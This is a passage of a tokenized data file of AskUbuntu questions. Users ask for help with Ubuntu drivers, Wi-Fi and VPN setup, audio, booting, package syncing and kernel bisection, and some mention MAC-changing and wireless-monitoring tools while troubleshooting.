gtk-widgets.css:760:1 : expected semicolon ( python-mkdebian:13589 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:780:0 : expected a valid selector ( python-mkdebian:13589 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:873:22 : not using units is deprecated . assuming 'px ' . ( python-mkdebian:13589 ) : gtk-warning ** : theme parsing error : button.css:155:14 : not using units is deprecated . assuming 'px ' . ( python-mkdebian:13589 ) : gtk-warning ** : theme parsing error : button.css:155:14 : junk at end of value ( python-mkdebian:13589 ) : gtk-warning ** : theme parsing error : toolbar.css:110:13 : not using units is deprecated . assuming 'px ' . ( python-mkdebian:13589 ) : gtk-warning ** : theme parsing error : toolbar.css:110:13 : junk at end of value -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- an error has occurred when creating debian packaging error : ca n't create or update ubuntu package fout : package commando gefaald annulering
397725	how to install grphics card driver installation on dell inspiron n5010	i am not able to install graphic card drivers on my dell inspiron n5010 model laptop . when i am trying to install fglrx from terminal vijay @ ubuntu : ~ $ sudo apt-get install fglrx reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : fglrx : conflicts : xorg-driver-binary nvidia-304-updates : conflicts : xorg-driver-binary e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages .
397727	i just moved the close/minimize/maxmize buttons to the right , how can i undo the action ?	i used this command gsettings set org.gnome.desktop.wm.preferences button-layout ' : minimize , maximize , close' how can i reset them back to the right ?
397728	grsync copies already existing files in target folder - how to tell it not to ?	i try to sync a folder in an external drive which i use as backup for my videos , with my video folder in my pc . obviously i do n't want files already existing in my target folder to be re-copied , but this is what grsync seems to do , taking ages to finish the job . how to instruct it not to re-copy the files already existing ? i checked and un-checked both `` ignore existing '' and `` size only '' buttons with no effect .
397731	how to save a file being streamed using real time streaming protocol ?	i want to save an mp4 video file which is being streamed using rtsp : // . i have tried to save it using ffmpeg , but the result i got was with numerous mistakes . i tried vlc also , but the video and audio were unsynchcronised . 'rtmpdump ' does not work neither . for example , i want to save the following video being streamed using this protocol : rtsp : //a1966.v1252936.c125293.g.vq.akamaistream.net/7/1966/125293/v0001/mp4.od.origin.zdf.de.gl-systemhaus.de/dach/zdf/13/12/131231_buniatishvili_kuk_1456k_p13v11.mp4 how may i achieve the same ?
397732	graphics information not showing up in system details	my graphics card does n't show up in system details . it does n't show up as unknown , it just stays blank : i have an integrated intel hd 4600 card as well as a discrete nvidia gt755m . i am running ubuntu 12.04 . the drivers for both cards are up-to-date . i am a total newbie to ubuntu and ask ubuntu , so i really do n't know if i am doing this right . if there is anything else i should post here to help answer my question please tell me . if this is a duplicate , please point me to the other question .
397735	which are the points to be ensured for booting from usb	i ca n't boot from a usb . if i press f12 when computer starts and take boot menu , it just displays the complete list as hard disk , cd-rom , usb-fdd , usb-hdd , etc.. , i 've selected the option `` usb-hdd '' but it does n't boot from usb . i 've done this in even some older pcs and it only displays as sandisk , hard-disk , cd-drive , the only valid boot devices . but in my pc , it displays the entire list . how can i change this boot menu ? i also tried it by setting the 1st boot device to usb-hdd and even it does n't works . anybody please help me to boot from usb , which are the points to be ensured for booting from usb . i 've created the usb successfully with unetbootin . there is no other errors with the pendrive . i 've verified the usb is working in some other pcs . thank you .
397736	monitor bios activity	as i read today , secret services are able to infect the bios of almost every computer using different methods . is there a way to find out if this has happened on my ubuntu notebook , for example monitoring the bios activity ? greetings
397742	ssh backup host	i have a pc called monkey , when monkey is connected to the lan of my network it has ip address 192.168.1.101 , when monkey is connected to the wlan of my network it has ip adress 192.168.0.107 . now in my ssh config file i have two hosts for monkey , monkey_lan and monkey_wlan . i would like to be able to type ssh monkey and that my ssh_config file figures out if monkey is on the lan or wlan . i 've tried to reserve only one ip adress with dhcp for monkey but this is not possible if monkey has a different mac address for lan and wlan , and i would prefer to keep two different mac addresses . i think the solution should be with the proxycommand option in the ssh_config file and then open a bash script but i have n't got this working yet . any advise ?
397743	help needed in setting up wifi on ubuntu 12.10 with gnome 3 on a lenovo b590 laptop with bcm43142 wireless lan controller	i use ubuntu 12.10 with gnome 3 on a lenovo b590 laptop with bcm43142 wireless lan controller . iam unable to configure to use wifi on my laptop . i tried this - sudo apt-get install -- reinstall linux-headers-generic linux-headers-`uname -r` sudo apt-get install -- reinstall bcmwl-kernel-source sudo modprobe wl but it did n't work . help needed to make it set up .
397745	how to install ubuntu alongside maveriks ?	someone can tell me if it is possible to create a dual boot ubuntu/maveriks . i have ubuntu 12.04 and it will be nice to have maveriks .
397746	how to download playlist of videos from youtube ?	i want to download videos from youtube which are as playlist in youtube .
397748	volume control applet disappeared	i 've just installed xubuntu 13.10 , played around with it to customize the gui . i somehow lost the volume control applet from the notification area . how can i get it back ? i 've already clicked through all preferences menus i could find . btw : why is this applet part of a notification area ?
397749	new user from text file script	hello guys im new in ubuntu , so i have an assigment to make a script that makes new user from text file.i have some problems and cant extract from text.may u help me ? thanks a lot . here 's my code : while [ $ username ! = `` '' ] do username=`grep `` username00 $ num '' $ path | cut -f2 -d : ` # username num= $ ( ( $ num+1 ) ) password=`grep `` password '' $ path | cut -f2 -d : ` group=`grep `` group '' $ path |cut -f2 -d : ` # group groupadd $ group the problem is on first line , i cant paste the whole code cause is 160 lines .
397750	windows hibernate and problems with copying	i hibernate windows 7 and open ubuntu . afterthat , i mount my remaining drives ( excluding c which i obviously ca n't ) and use ubuntu .. but if i want to copy some file into other drives i can do it but when i restart ubuntu and resume windows i ca n't see them . to see those files in windows i have to restart windows . is there a way in which i can do this thing without actually restarting windows 7 'cause restarting windows takes hell lot of time thanks
397752	about the calendar on the top bar	so ubuntu has this calendar on the top bar ( unity ) . now whenever i open it and click on a day , it gets highlighted with bright orange color . if i close it now and open it again after like 1 or 2 days , the highlighted color still stays on the day i selected before , creating confusion because it is obviously not that day anymore . is there anyway i can fix this ?
397753	samba resets password after reboot	everytime i restart my desktop , samba server resets password for the alias i have created for my user account . i use gui samba server configuration . so , for example , i created an alias called `` g '' for my user and set a password `` a '' for it . after reboot , when i try to connect from a different devices , it does n't allow it to connect . when i check settings for this alias : samba user settings window it clearly shows that the password is not `` a '' anymore , but something else . it 's not my system user 's password either , since i also can not connect with it . why is my password resetting to something else ? !
397756	is it possible to configure pptp vpn on lubuntu 13.10	i have lubuntu 13.10 . unfortunately i can connect to internet only using pptp vpn . but i have some issues with it . last time when i tried to configure it i had constant disconnects every 5-30 seconds ... can you please help me to configure it and teach me how ?
397757	nautilus never stops counting the size of multiple folders at the same time	i have installed 13.10 and everything seems to work fine . however when i try to measure the size of multiple files at the same time the size section does not stop rising . after a while ( not the real size ) it becomes `` 0 '' and start counting again like ; 0-5gb-10gb-12gb-15gb-0gb ... ... . it never stops . when it is multiple objects , it works fine and tells me the real size . so far i have tried ; -small sized folders ; works -large sized folders ( bigger than 16 gb per folder ) ; not work -all files in a folder ; no work -some files % folder in a folder ; no work -in an external drive ; same scenerios above.. -system folders ; when more than 3 folders again no work , less than 3 , sometimes work . i do n't know if this is about ubuntu or nautilus . i am so new to ubuntu and linux world ( long time ago i have used many but it has been years ) and i know that every part of the os is independent mostly like a lego but still it makes me afraid of that the os is going to damage my folders.that is the story before i switched to ubuntu from a windows 8 adventure , and i have lost 2 hdds , more than 10000 photos so i am kind of paranoid , and have choosen to go with ubuntu anymore since there is no virus risk and driver , crack efforts etc . i need a nice and trustable environment to organise & remake my folders , files which are bigger than 400gb -which i only need 50-60 of them , since many are back ups , recoveries and duplicates from broken disks- right now . so i am not sure if i should even try to fix nautilus problem or directly switch to 12.04 lts even though i loved to have new unity tweaks and kernel . btw my system is a samsung r580 js04tr with i5 cpu , 330m gpu , 4gb of ram and 750gb of hdd ... thanks..
397760	guys , i got a problem ... i installed a proprietary driver in ubuntu . but it says : your proprietary driver is activated but it is not in use	my notebook is an acer e1-421 and my graphics video is vga radeon hd 6310 . ubuntu has listed for me the proprietary drives that i could install , and i chose one of them . but now appears a message that the proprietary driver installed is activated but it 's not in use . what i have to do to fix this ?
397761	global menu disabled in some apps	i have ubuntu 13.10 and in some apps ( transmission , gimp ) is menu visible but all items disabled , i can still access funcions with hud , but menu just does not work . i have many ppas added , what could cause this ?
397763	oneconf does n't work in 13.10 , so how to sync installed apps safely via the terminal ?	seems there is confirmed bug and oneconf ( app center installed apps sync ) does n't work in 13.10 . at least for me and quite few people . so , i know there is method to do the same via the terminal , but from what i 've read so far there are risks that you might uninstall a driver or something else critical . i 've found here ways like : sudo dpkg -- get-selections | grep ' [ [ : space : ] ] install $ ='| awk ' { print $ 1 } ' > installedpackages to get a list and cat installedpackages | xargs sudo apt-get -- ignore-missing install and dpkg -- get-selections > dpkg -- set-selections < apt-get dselect-upgrade but since i 'm new i 'm not sure exactly what they do and if this is a safe way to do it at all ? so what i 'm asking is if someone can give me tested way to do it safely . thank you !
397766	firefox wo n't install	i accidentally removed firefox from my gnome desktop . i tried to reinstall , but it says `` waiting to install '' , and it wont . i 'm connected to wireless via cable . also , for some reason , i ca n't seem to connect to the wireless , with out the cable . windows connected fine , in the same spot . thanks so much !
397768	xubuntu 13.10 : only four levels of brightness ?	why do i have only four levels of brightness on my dell inspiron laptop , selectable by fn+arrowdown/up ? in linux mint mate , i have 7 or 8 , and so i have under windows , on the same machine ? this is annoying ...
397769	ufw blocks packets by the router , spams the log	while checking my systems logs i noticed this : dec 30 19:45:24 nick-laptop kernel : [ 5324.288321 ] [ ufw block ] in=eth0 out= mac=01:00:5e:00:00:01:00:05:59:49:62 : aa:08:00 src=192.168.2.1 dst=224.0.0.1 len=32 tos=0x18 prec=0xa0 ttl=1 id=1000 proto=2 my point is is that just a packet comming from the internet thats blocked or a packet comming from my router . why is it being blocked ? can i get more information about the packet ? can i prevent the logs from happening ? my ufw rules : status : active logging : on ( low ) default : deny ( incoming ) , allow ( outgoing ) new profiles : skip
397771	how to share wine with other machine ?	guys i downloaded wine on my kubuntu , but now i want to share it with my friend.how can i do it ? my friend has very slow internet connection , so he can not download it by himself.please help me .
397778	can removing gufw create dangers for my system ?	i learned that the firewall settings for 12.04 were by default disabled so i went to the software center and downloaded and enabled the gufw firewall gui config . i thought having a firewall would be a good thing but it turns out that it is n't needed . i went back to the app and it was disabled automatically ( for some reason ) . i removed it anyway . i guess my question is , do you really need a firewall for desktops ? another question would be , did i do anything wrong by removing the app in the software center ?
397779	mac address changing	i have alfa awus036nh and for some commands i need to change it 's mac address but it always gives me error please help ... . ! when i do sudo ifconfig -a it give me this : wlan1 link encap : unspec hwaddr 00-c0-ca-28-9f-c7-33-30-00-00-00-00-00-00-00-00 up broadcast notrailers promisc allmulti mtu:1500 metric:1 rx packets:39069 errors:0 dropped:97 overruns:0 frame:0 tx packets:34743 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:42537771 ( 42.5 mb ) tx bytes:4448035 ( 4.4 mb )
397783	fix external hd ?	i had an issue with my external hd ( files stored on bad blocks ) , so i decided to try my luck at fsck.ext4 , using settings from some tutorials . well , this would have been great and all , and maybe even fixed the issue , if i had n't been stupid enough to do this : fsck.ext4 -options /dev/sdb i basically ran fsck.ext4 on the entire drive , not just the ext4 partition . so now , it wo n't recognize the partition ( obviously ) , and i 'm not sure how to get my data back ( i would really like to get it back ) . any way to do this ?
397790	can not boot to ubuntu	i have windows 7 installed on the ssd and the ubuntu is installed on the hdd i got no errors after the installation and when i start up the computer it goes directly to windows 7 i 'm assuming that ubuntu was installed correctly , because hdd is missing that 300gb that i reserved for it . http : //i.stack.imgur.com/k3e3h.png i have also tried changing these bios boot settings , but nothing has helped http : //i.stack.imgur.com/i9uyq.jpg
397791	ubuntu wo n't suspend , shutdown , etc	i 've read everything i can find and ca n't seem to fix this . i removed novatel_3g_suspend for etc/pm/sleep.d ( this fixed it initially but only once and issue persisted afterwards ) , removed toshset , and tried shutting down via the terminal . when i shut down i get this error : i2400m_usb 1-1.1:1.0 : bm-ack : urb error -71 , retrying that just sits there a black screen until i hold the power button and force a shutdown when i turn it back on i get this : i2400m_usb 1-1.1:1.0 : wimax interface wmx0 ( 64 : d4 : da:65:91 : aa ) ready i2400m_usb 1-1.1:1.0 : e : __i2400mu_send_barker : maximum errors in urb exceeded ; resetting device i2400m_usb 1-1.1:1.0 : warm reset failed ( -71 ) ; trying usb reset then i get this line repeating : i2400m_usb 1-1.1:1.0 : bm-ack : urb error -71 , retrying after a second or two it disapears and i get the login screen i have an asus laptop with a 2nd gen i5 , 6gb ram , and ubuntu 13.10
397794	how to fix an `` error : attempt to read or write outside of disk 'hd0 '	i am completely new to using linux of any kind . i tried to instal ubuntu 13.10 to a western digital ultra 1tb harddrive . i have an hp probook 4530s running windows 7 64bit os . after instaling linux to the hardrive it asked me to restart , when i restarted it gave me this error message error : attempt to read or write outside of disk 'hd0' entering rescue mode grub rescue > anyway , i ran the graphical boot repair tool , and it did not work . here is the url it gave me http : //paste.ubuntu.com/6664110/ any help is welcome , but please give me the simplest laymen terms you can thank you !
397795	using btrfs with bcache on /	i am using btrfs with bcache for / on ubuntu 13.10 . it 's fast . unfortunately , during normal boots the step `` scanning for btrfs filesystems '' fails . to successfully boot i have to enter recovery mode and then simply choose the menu option `` continue to the main system '' . i assume a normal boot fails because the bcache0 device has not finished being created by the time btrfs scans for its filesystems . how can i insert a delay between these steps ?
397796	ubuntu touch phablet-flash autodetect fails	i 'm trying to install ubuntu touch on a wifi motorola xoom . it 's unlocked , adb sees it , i 'm following the wiki instructions and i have wingray ready . this command : phablet-flash ubuntu-system -channel devel -- bootstrap returns : info : phablet-flash device detected as wingray error : phablet-flash : unsupported device , autodetect fails device what am i missing ? does wingray need to be in the same directory ? i 'm running the command from sdk/tools . thanks !
397797	ca n't connect to wireless	ubuntu wo n't connect to my wireless . windows connected just fine , in the same spot . when i try and connect , it tries for a minute or so , then says `` disconnected , you are now offline '' the signal strength is fine . thanks !
397799	audio not working in ubuntu 12.04	i installed ubuntu 12.04 some days ago . all works well , except audio , that 's completely missing . i tried several solutions , in particular modification of the file sudo gedit /etc/modprobe.d/alsa-base.conf i try to add this line at the and of file , and change the last value several time options snd-hda-intel index=0 model=3stack-dig options snd-hda-intel index=0 model=generic options snd-hda-intel index=0 model=6stack-dig options snd-hda-intel index=0 model=auto but nothing seems to work . output of lspci | grep -i audio is 00:05.0 audio device : nvidia corporation mcp61 high definition audio ( rev a2 ) 02:00.1 audio device : advanced micro devices , inc. [ amd/ati ] caicos hdmi audio [ radeon hd 6400 series ] output of aplay -l is **** list of playback hardware devices **** card 0 : nvidia [ hda nvidia ] , device 0 : hda generic [ hda generic ] subdevice : 0/1 subdevice # 0 : subdevice # 0 card 1 : generic [ hd-audio generic ] , device 3 : hdmi 0 [ hdmi 0 ] subdevice : 1/1 subdevice # 0 : subdevice # 0 output command sudo lshw appear both card , nvidia and amd *-multimedia description : audio device product : mcp61 high definition audio vendor : nvidia corporation physical id : 5 bus info : pci @ 0000:00:05.0 version : a2 width : 32 bits clock : 66mhz capabilities : pm msi ht bus_master cap_list configuration : driver=snd_hda_intel latency=0 maxlatency=5 mingnt=2 resources : irq:23 memory : fbff8000-fbffbfff *-multimedia description : audio device product : caicos hdmi audio [ radeon hd 6400 series ] vendor : hynix semiconductor ( hyundai electronics ) physical id : 0.1 bus info : pci @ 0000:02:00.1 version : 00 width : 64 bits clock : 33mhz capabilities : pm pciexpress msi bus_master cap_list configuration : driver=snd_hda_intel latency=0 resources : irq:43 memory : fbdfc000-fbdfffff thanks a lot .
397801	upload a file to url from command line	we can download a file using the following command line in ubuntu : wget url can anyone tell me how to upload file to url ?
397802	steam crashes using playonlinux	i have an odd problem . some time ago i used playonlinux on ubuntu to install rage ( through steam ) , this worked and still works perfectly . i now want to make another virtual drive to install simcity4 , this fails when i login to steam crashing entirely before i even get to the game . the log output is as follows : http : //pastebin.com/3gnzicus since this works right now for another drive i am confused to say the least . any help appreciated ?
397806	mac address error : device or resource busy	please can anybody explain this when am using the following commands ? mohammad @ dv6-notebook : ~ $ sudo -i root @ dv6-notebook : ~ # airmon-ng stop wlan1 interface chipset driver wlan0 unknown iwlwifi - [ phy0 ] wlan1 unknown rt2800usb - [ phy1 ] ( monitor mode disabled ) root @ dv6-notebook : ~ # macchanger -- mac 01:02:03:04:05:06 wlan1 permanent mac : 00 : c0 : ca:28:9f : c7 ( alfa , inc. ) current mac : 00 : c0 : ca:28:9f : c7 ( alfa , inc. ) error : ca n't change mac : interface up or not permission : device or resource busy
397807	i have n't got wlan0	i am new with gnu/linux operating systems and specially with recently installed ubuntu 12.04.3 lts . i wanted to learn something about wlan-s security and y tried to work with `` aircrack-ng '' . i have a samsung n150plus laptop and when i was trying this , with `` macchanger '' , `` kismet '' and `` aircrack-ng '' already installed , i see that i have n't any `` wlan0 '' , replacing it i believe that is `` eth1 '' and i ca n't work with that . i post you a code from terminal : enter code hereroot @ samsung-n150p : /home/samsung # iwconfig lo no wireless extensions . eth0 no wireless extensions . eth1 ieee 802.11abg essid : '' wlan_71 '' mode : managed frequency:2.452 ghz access point : 00:02 : cf : c0:95:29 bit rate=36 mb/s tx-power=200 dbm retry long limit:7 rts thr : off fragment thr : off encryption key : off power management : on link quality=33/70 signal level=-77 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:0 missed beacon:0 root @ samsung-n150p : /home/samsung # airmon-ng start eth1 found 5 processes that could cause trouble . if airodump-ng , aireplay-ng or airtun-ng stops working after a short period of time , you may want to kill ( some of ) them ! pid name 823 avahi-daemon 824 avahi-daemon 856 networkmanager 1013 wpa_supplicant 6795 dhclient process with pid 6795 ( dhclient ) is running on interface eth1 interface chipset driver eth1 unknown wl - [ phy0 ] mon0 : error while getting interface flags : no such device ( monitor mode enabled on mon0 ) root @ samsung-n150p : /home/samsung # ifconfig mon0 down mon0 : error while getting interface flags : no such device and i do n't have any problem with wireless connections , in this moment i 'm writing that from the laptop with wifi and works perfectly . help me please . thank you for reading ; ]
397813	5 % xorg cpu usage after changing laptop brightness ?	when i change brightness on the laptop with a laptop keys the brightness is behaving strangely for a couple of minutes , and xorg eats 5 % cpu during this time . i had the same effect on my previous laptop , which i attributed to its dying hardware . now i get the same issue after a year usage of my new laptop . on the first laptop i used proprientary ati radeon drivers , and on the current one i use proprientary nvidia drivers . i 'm currently using a kubuntu-dev , but on the old laptop i 've used a stable release . i found a somewhat similar old thread on ubuntu forums with none responces . edit i tried adjusting brightness from cli ( see here and there ) and also using gui wigdet ( i 'm on kde ) -- but nothing works : sloppy state frees me faster -- but does n't change the brightness . the brightness is only changed with laptop brightness keys , and it takes a couple of minutes to complete that 5 % cpu xorg task .
397814	is it possible to define the maximum voize computer can output in ubuntu ?	i 'm living in an apartment building and it is forbidden to make hard noise at nights . is it possible to configure ubuntu such that the speaker wo n't output noise in too high volume at nights ?
397815	how do i get to files save on my windows system	i 've installed ubuntu alongside windows 7 . how do i get access to my windows files with ubuntu ?
397816	how to kill movie player from terminal ?	on ubuntu 12.04 the default movie player has hanged on a frame while playing a ( faulty ? ) mkv video . i tried to close it by right click > close but could not terminat it . it also does not start when i try to play a new video . how can i kill the process from command line ?
397817	where are the missing build files for performing a kernel bisection ?	i am attempting my first-ever kernel bisection to try and help debug a regression that occurred somewhere between 13.04 and 13.10 . i am trying to follow the instructions listed at https : //wiki.ubuntu.com/kernel/kernelbisection # bisecting_ubuntu_kernel_versions , but i am unable to find all the build files needed to install a kernel version . for example , i am attempting to install the saucy 3.8.0-19.29 kernel for amd64 . the linked wiki page above says i should find files similar to these : linux-headers-2.6.35-32-generic-pae_2.6.35-32.68_i386.deb ( 793.3 kib ) linux-headers-2.6.35-32_2.6.35-32.68_all.deb ( 9.9 mib ) linux-image-2.6.35-32-generic-pae_2.6.35-32.68_i386.deb ( 32.5 mib ) however , from the linked build page , the closest i can find are just these : linux-headers-3.8.0-19-generic_3.8.0-19.29_amd64.deb ( 973.7 kib ) linux-image-3.8.0-19-generic_3.8.0-19.29_amd64.deb ( 11.8 mib ) if i try to just download these and run sudo dpkg -i *.deb , i am given the following output with errors installing the headers : christopher @ saucybisectiontest : ~/downloads/3.8.0-19.29 $ sudo dpkg -i *.deb [ sudo ] password for christopher : selecting previously unselected package linux-headers-3.8.0-19-generic . ( reading database ... 193537 files and directories currently installed . ) unpacking linux-headers-3.8.0-19-generic ( from linux-headers-3.8.0-19-generic_3.8.0-19.29_amd64.deb ) ... selecting previously unselected package linux-image-3.8.0-19-generic . unpacking linux-image-3.8.0-19-generic ( from linux-image-3.8.0-19-generic_3.8.0-19.29_amd64.deb ) ... done . dpkg : dependency problems prevent configuration of linux-headers-3.8.0-19-generic : linux-headers-3.8.0-19-generic depends on linux-headers-3.8.0-19 ; however : package linux-headers-3.8.0-19 is not installed . dpkg : error processing linux-headers-3.8.0-19-generic ( -- install ) : dependency problems - leaving unconfigured setting up linux-image-3.8.0-19-generic ( 3.8.0-19.29 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/apt-auto-removal 3.8.0-19-generic /boot/vmlinuz-3.8.0-19-generic run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.8.0-19-generic /boot/vmlinuz-3.8.0-19-generic update-initramfs : generating /boot/initrd.img-3.8.0-19-generic run-parts : executing /etc/kernel/postinst.d/pm-utils 3.8.0-19-generic /boot/vmlinuz-3.8.0-19-generic run-parts : executing /etc/kernel/postinst.d/update-notifier 3.8.0-19-generic /boot/vmlinuz-3.8.0-19-generic run-parts : executing /etc/kernel/postinst.d/zz-update-grub 3.8.0-19-generic /boot/vmlinuz-3.8.0-19-generic generating grub.cfg ... found linux image : /boot/vmlinuz-3.11.0-14-generic found initrd image : /boot/initrd.img-3.11.0-14-generic found linux image : /boot/vmlinuz-3.11.0-12-generic found initrd image : /boot/initrd.img-3.11.0-12-generic found linux image : /boot/vmlinuz-3.8.0-19-generic found initrd image : /boot/initrd.img-3.8.0-19-generic found memtest86+ image : /boot/memtest86+.bin done errors were encountered while processing : linux-headers-3.8.0-19-generic how should i resolve this ?
397819	ubuntu 13.10 and xfce4 : no sound at all	i did n't want to reinstall my ubuntu to xubuntu so i decided to install xfce4 on ubuntu 13.10 with : sudo apt-get install xfce4 i logued on for first time and the sound was working well . however after a reboot the sound did n't work anymore ... i tried : - reinstalling alsa = > did n't work reinstalling xfce4-mixer = > did n't work adding options snd-hda-intel model=laptop-eapd to /etc/modprobe.d/alsa-base.conf = > did n't work speaker-test -c 6 = > no sound i am out of idea now.i thank in advance those who have an idea that could help me . my config : laptop asus n56vz ubuntu 13.10 - xfce4
397821	how can i get this .sh file to run properly ?	i 'm trying to take a .bat file and make it a .sh this is the working .bat file @ echo off title runserver '' c : \program files\java\jdk1.7.0_25\bin\java.exe '' -xmx815m -cp bin ; lib/* ; com.rs.launcher true true false pause this is my .sh file so far : # ! /bin/sh java -xmx815m -cp bin ; lib/* ; com.rs.launcher true true false pause is this wrong ? am i far off ? i do n't really know what i 'm doing when it comes to .sh files so any help will be appreciated ! thanks a lot !
397826	why do i have ( and how do i fix ) this jagged , pixelated mouse cursor ?	i installed xubuntu 13.10 and the system uses this awful , pixelated cursor . at first , i thought it was a minor glitch in the installer . it 's actually a problem that persisted into the installed system . what 's the problem here ? how do i fix this ? i attached two screenshots . the first is what is actually displayed on two of my monitors . looks like some kind of subpixel problem . the second screenshot was made using the `` screenshot '' utility . so ... in memory , it 's all good , but , on screen , it 's actually messed up ... i 'm using a whatever built-in graphics processor a xeon haswell has , on a supermicro motherboard that has an on-board vga-out . the expectation was to have `` nice , smooth looking cursors '' , as opposed to `` jagged , gon na -shank-you looking cursors '' .
397831	monkeyjam ubuntu wine menu index out of range ?	so i finally got monkeyjam working with winetricks and wine , but now when i start the camera capture window , i get an error saying `` menu index out of range '' i tested my webcam and it worked with cheese . what now ? i have it plugged in and it did work with monkeyjam on windows in the past .
397833	disable or change time it requires for ubuntu to display `` force close '' window	is there a way to change time it requires for ubuntu to display `` force close '' window on an unresponsive application , if not , is there a way to disable `` force close '' window ?
397837	`` no available channels '' with ubuntu dual boot on nexus 5	i successfully installed ubuntu touch on my nexus 4 yesterday alongside cyanogenmod 10.2 . today i used the method described on the ubuntu wiki to install the `` ubuntu dual boot installer '' on my nexus 5 alongside cyanogenmod 11 , but the app does n't have the `` trusty '' channel available like it did yesterday . it just says `` install ubuntu -- no channels available '' . this forum post recommend changing my /system/build.prop file to have these values : ro.product.model=nexus 4 ro.product.device=mako ro.product.manufacturer=lge but i 'm afraid of what that will do to my android installation .
397839	what are the ubuntu-specific wherewithals against heat ?	note : this is not another question about my laptop overheats under ubuntu x.y , but more of a reflexion about what makes ubuntu ( in this case , 12.04 ) handle heat better than other distributions on my machine . i am not a great ubuntu fan . i discovered linux thanks to it , but i 'm still an arch linux user anyway . but here 's the thing ... under arch , it gets really hot ! and after some tests ... the same thing happens under opensuse , debian , and centos ... but not on ubuntu , and that 's where i really start wondering . first , let 's see about my machine . i own a sony laptop , e series , which runs thanks to an intel i7 core , and an amd/ati radeon hd 6000 series graphic card . i believe those two are the main components here . when i did my first migration to arch , and met the first heat problems , i went looking for solutions , configurations , packages , that would help me get my arch at the same temperatures as my ubuntu : cpu frequency scaling ; this is a big thing when you set up an arch laptop . i used cpupower , granola , governors , i tried all possible configurations , i studied most of them , and so on ... proprietary drivers ; no doubt on this : my amd/ati graphic card prefers its catalyst driver to the open-source one . i installed it and yes , i earned a few degrees ... laptop mode tools ; i started using the acpi events , setting autosuspend , brightness , network power saving and so on ... when i realised that those changes did not bring a lot of improvements , i started looking around opensuse , centos and debian itself , and yet , the same problem occured . so basically , here is my question : what are the ubuntu-specific ways to fight overheat , and bad cpu temperatures in general ? what is it that makes my ubuntu laptop cooler than any other distribution i use ? are there specific applications to handle this problem ? are the settings different when it comes to cpu scalling , laptop-specifics , and so on ? from comments and answers ... ( lekensteyn ) for testing purposes , i will try injecting the ubuntu kernel onto by arch installation : i should see if differences can be found that deep . ( lekensteyn ) i will have a look at dpm settings , and set it up . ( psusi ) i will edit /sys/class/drm/card0/device/power_profile to force the machine into a low performance state , and see what changes .
397842	how to find the biggest directories in my hard drive ?	i logged into my server this morning and received a disk is full error . how do i fix this or find wherever all of this data is hiding ?
397847	vpn connection is not being established	i need to get a vpn running to my university . i have all the correct credentiels and information but for some reason no connection is being established . i have no clue why no connection is being established neither do people from my university . they do n't really support ubuntu but i had vpn working a few ubuntu releases earlier without any effort , i believe 12.04 lts . i knew already a long time that it is n't working but i did n't really needed it back then so i did n't bother about it . i am using ubuntu ubuntu 13.04 64-bit with gnome 3.8.3 . syslog showed me the following . hopefully someone can say something usefull ? to log starts after i have given the command to establish a connection . dec 30 22:04:11 wg-tablet networkmanager [ 910 ] : < info > starting vpn service 'pptp ' ... dec 30 22:04:11 wg-tablet networkmanager [ 910 ] : < info > vpn service 'pptp ' started ( org.freedesktop.networkmanager.pptp ) , pid 15814 dec 30 22:04:11 wg-tablet networkmanager [ 910 ] : < info > vpn service 'pptp ' appeared ; activating connections dec 30 22:04:11 wg-tablet networkmanager [ 910 ] : < info > vpn plugin state changed : starting ( 3 ) dec 30 22:04:12 wg-tablet networkmanager [ 910 ] : < info > vpn connection 'tue ' ( connect ) reply received . dec 30 22:04:12 wg-tablet pppd [ 15815 ] : plugin /usr/lib/pppd/2.4.5/nm-pptp-pppd-plugin.so loaded . dec 30 22:04:12 wg-tablet pppd [ 15815 ] : pppd 2.4.5 started by root , uid 0 dec 30 22:04:12 wg-tablet pppd [ 15815 ] : using interface ppp0 dec 30 22:04:12 wg-tablet pppd [ 15815 ] : connect : ppp0 < -- > /dev/pts/10 dec 30 22:04:12 wg-tablet networkmanager [ 910 ] : scplugin-ifupdown : devices added ( path : /sys/devices/virtual/net/ppp0 , iface : ppp0 ) dec 30 22:04:12 wg-tablet networkmanager [ 910 ] : scplugin-ifupdown : device added ( path : /sys/devices/virtual/net/ppp0 , iface : ppp0 ) : no ifupdown configuration found . dec 30 22:04:12 wg-tablet networkmanager [ 910 ] : < warn > /sys/devices/virtual/net/ppp0 : could n't determine device driver ; ignoring ... dec 30 22:04:12 wg-tablet pptp [ 15821 ] : nm-pptp-service-15814 log [ main : pptp.c:314 ] : the synchronous pptp option is not activated dec 30 22:04:12 wg-tablet pptp [ 15829 ] : nm-pptp-service-15814 log [ ctrlp_rep : pptp_ctrl.c:251 ] : sent control packet type is 1 'start-control-connection-request' dec 30 22:04:12 wg-tablet pptp [ 15829 ] : nm-pptp-service-15814 log [ ctrlp_disp : pptp_ctrl.c:739 ] : received start control connection reply dec 30 22:04:12 wg-tablet pptp [ 15829 ] : nm-pptp-service-15814 log [ ctrlp_disp : pptp_ctrl.c:773 ] : client connection established . dec 30 22:04:13 wg-tablet pptp [ 15829 ] : nm-pptp-service-15814 log [ ctrlp_rep : pptp_ctrl.c:251 ] : sent control packet type is 7 'outgoing-call-request' dec 30 22:04:13 wg-tablet pptp [ 15829 ] : nm-pptp-service-15814 log [ ctrlp_disp : pptp_ctrl.c:858 ] : received outgoing call reply . dec 30 22:04:13 wg-tablet pptp [ 15829 ] : nm-pptp-service-15814 log [ ctrlp_disp : pptp_ctrl.c:897 ] : outgoing call established ( call id 0 , peer 's call id 42674 ) . dec 30 22:04:43 wg-tablet pppd [ 15815 ] : lcp : timeout sending config-requests dec 30 22:04:43 wg-tablet pppd [ 15815 ] : connection terminated . dec 30 22:04:43 wg-tablet avahi-daemon [ 890 ] : withdrawing workstation service for ppp0 . dec 30 22:04:43 wg-tablet networkmanager [ 910 ] : < warn > vpn plugin failed : 1 dec 